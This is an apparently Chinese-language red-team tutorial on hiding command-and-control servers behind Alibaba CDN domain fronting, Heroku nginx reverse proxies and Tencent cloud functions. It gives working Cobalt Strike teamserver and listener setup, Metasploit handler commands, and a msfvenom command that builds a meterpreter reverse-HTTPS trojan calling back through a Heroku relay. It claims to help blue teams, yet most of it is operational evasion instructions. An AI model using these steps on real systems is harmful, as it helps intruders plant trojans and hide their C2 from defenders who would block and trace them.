前记
随着HW的开始,蓝队弟弟们见识到了很多奇特的操作,本文主要从监测溯源时比较常见的一些红队的隐匿手法进行讲解。在实际攻防中有效的隐匿我们的C2主机也是很必要的,在工作的同时发现很多蓝队对此并不熟悉,所以本文会深入浅出的讲解三种常见的方式,希望通过本文能够对各位有所帮助。
域前置
域前置技术就是通过CDN节点将流量转发到真实的C2服务器,其中CDN节点ip通过识别请求的Host头进行流量转发。这里作者利用阿里云全站加速CDN实现任意HOST头修改,利用构造高信誉域名,从而实现绕过流量分析。
第一步
访问阿里云 CDN 全站加速配置,如下图:
点击添加域名,,填写CDN基本信息,加速域名处可以填写高信誉的域名,在国内绝大数的服务商,都需要验证主域名的归属,但是在阿里云全站加速CDN中只要IP是本用户阿里云的主机即可绕过验证。只需要填写加速域名以及IP即可完成配置,搭配CobaltStrike profile即可绕过达到隐蔽真实IP及Header的功能,进行隐蔽IP的功能。
如上图即填写完毕,之后等待CDN配置完毕即可正常使用。
第二步
使用多地ping对CNAME进行检测,得到多地CDN的IP。
全网PING:http://ping.chinaz.com/
这里使用用三个演示效果即可。
58.215.145.105
61.168.100.175
42.48.120.160
第三步
使用得到的IP,进入CobaltStrike,配置profile文件。
这边使用的profile是amazon.profile,其实也可以自己写。
下载地址:https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile
修改三处,header “Host” 即可。
第四步
开启CobaltStrike,开启命令:
./teamserver xxx.xxx.xxx.xxx password amazon.profile
进入CobaltStrike进行配置,监听器配置如下:
配置HTTPS Hosts为之前获取的CDN IP,HTTP Host(Stager)为nanci.tencent.com,也就是我们配置的加速域名,端口默认80即可。
然后开启监听器,生成木马。
发现成功上线
并且使用netstat可以看到我们的网络连接为之前的两个负载IP
如上图可以看到数据包的Host为nanci.tencent.com
至此域前置成功部署!
总结
配置简单
延展性强,可以随时更换IP,在红蓝对抗时可以快速部署,增加了防守封禁IP的难度。
Host高信誉域名。
注意阿里云不支持https的域前置
缺点:对CDN资源较大,不建议长时间使用(土豪除外)。
在前几天微步公开的情报中,提到了这一种攻击方式,所以作者在这里剖析了域前置的利用方式,希望能够对蓝方成员监控时有所帮助。
Heroku代理隐匿真实IP
Heroku是一个支持多种编程语言的云平台即服务。简单理解就是可以免费部署docker容器并且可以开放web服务到互联网.下面介绍操作步骤。其实简单来理解应用在C2隐匿上就是通过Nginx反向代理的方式,从heroku服务器代理到我们真实的VPS服务器。
Heroku在CobaltStrike中的应用
注册heroku账号,这里需要注意的是需要使用gmail邮箱注册,因为QQ以及163等国内邮件服务商被禁用,无法完成注册。
注册网址:https://dashboard.heroku.com/
注册成功后进行登录,访问以下网址进入配置页面。
https://dashboard.heroku.com/new?template=https://github.com/FunnyWolf/nginx-proxy-heroku
这里主要需要的是箭头所指的两处,其中App name为子域名前缀的名称,这里我们可以自定义,只要没有被注册过不重复即可。
而TARGET处,填写为我们真实的VPS服务器的域名,也就是需要代理的主机域名。这里格式为:https://baidu.com:8443,代理VPS的8443端口。
填写完毕后点击Deploy app自动部署。
如上图所示即配置成功。
在Cobaltstrike中配置两个监听器,设置PAYLOAD为Beacon HTTPS,HTTPS Hosts为sict.icu也就是我们真实的域名,HTTPS Port为8443端口。
监听器1如下图所示:
继续配置第二个监听器,同样设置PAYLOAD为Beacon HTTPS,HTTPS Hosts设置为nancicdn.herokuapp.com,也就是之前获取到的heroku的域名。
其中部署时配置的App name为子域名前缀,所以最终得到的heroku的域名就是nancicdn.herokuapp.com。HTTPS Port设置为443。
监听器2如下图所示:
监听器全部部署完毕后生成木马文件,注意生成木马的监听器设置为监听器2,也就是指向heroku域名的那一个监听器。
成功上线Cobaltstrike
Heroku在Metasploit中的应用
heroku服务的配置这里就不再赘述,直接从Metasploit的配置开始讲解。
打开msf
在metasploit中添加handler,配置如图:
使用模块payload/windows/x64/meterpreter_reverse_https
设置LHOST为我们实际指向的域名,LPORT为8443,是在heroku中配置的。
然后设置三个全局参数,如下:
setg OverrideLHOST nancicdn.herokuapp.com
setg OverrideLPORT 443
setg OverrideRequestHost true
OverrideLHOST为我们heroku的地址,后面主域名为固定的,子域名前缀为刚才heroku中配置的App name。端口为443因为我们配置的是https协议。
参数配置完毕后,输入to_handler开启监听。
如上图可以看到已经开启8443端口的监听,即配置完毕。
使用命令生成木马
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=nancicdn.herokuapp.com LPORT=443 -f exe -o payload.exe
然后将生成的木马上传至虚拟机并执行。
执行后发现在metasploit成功上线。
可以看到session的链接地址为heroku中转服务器地址,而且不同的heroku部署其连接的IP是不相同的。
如下图:
Target 1
Target 2
总结
heroku隐藏C2从技术原理上看非常简单,使用heroku服务部署nginx反向代理服务,payload连接heroku的nginx,nginx将流量转发到C2。
具体优势如下:
只需要注册heroku免费账号即可
无需注册或购买域名
自带可信的SSL证书(heroku域名自带证书)
如果IP地址被封锁,可删除原有heroku app重新部署heroku app(大约需要30s),与防守人员持续对抗
操作步骤简单
云函数
这个技术最先是在今年的3月份国外提出的,他们利用 azure 对 C2 进行隐藏,国内也有相对应的 云函数厂商,于是我们就尝试使用云函数对我们的 C2 服务器进行隐藏。
配置过程
点击新建云函数,选择创建方式—自定义创建,函数名称自定义或者默认都可以,运行环境选择python3.6,当然也有师傅去用其他语言版本去写但是原理都是一样的,地域随意即可。
点击完成,我们先不编辑云函数代码。
创建触发器,具体配置如上图,我们使用API网关来进行触发函数。
按照上例图片配置一下API网关的默认路径,然后选择立即完成并发布任务即可。
然后我们编辑一下云函数,注意修改C2变量的内容为自己ip即可。下面的使用x-forward-for来确认目标主机的真实ip,不配置的话不影响正常使用,但是上线主机的ip会是云函数主机的IP地址。
这里配置完成后,我们得到API网关地址如下图:
注意发布
然后我们开始配置CS客户端,创建一个监听器,配置如下图,把API网关地址复制进去,注意端口必须设置为80,如果想要设置为其他的还需要配置一下云函数。
设置profile文件启动,配置文件http-config设置如下:
这里是为了与上面的云函数同步使用X-Forward-For来获取真实ip
然后我们生成木马进行上线。
成功上线!
下面我们来分析一下木马程序,首先查看本地外联ip为腾讯云IP地址
发现是腾讯云主机
继续分析上传病毒样本至微步平台(这也是蓝队成员最常用的分析手段)
可以看到只能捕获到API网关域名。
总结
云函数的好处就是配置简单,免费,高效,很适合日常渗透使用。
嘿嘿,写到最后就不太想凑字数了。
后记
本文到这里就接近尾声了,正值HW时期,希望以本文能够对广大防守方成员有所帮助,面对红队的隐匿技术,在工作中碰到这种问题可以第一时间进行响应研判,当然以上的几种方式都不太好溯源,这也是时至今日这些方法依旧有效的原因,尤其是今年的HW中,这些方式更加频繁的映入我们的眼帘。今年不仅仅是大量的0day爆出,也有一些奇淫巧计的产生,在检验企业安全体系能力的同时也在磨练红蓝双方人员的实力,这也是红蓝对抗的意义所在。
最后,小安是我好大哥!(打工人小安)~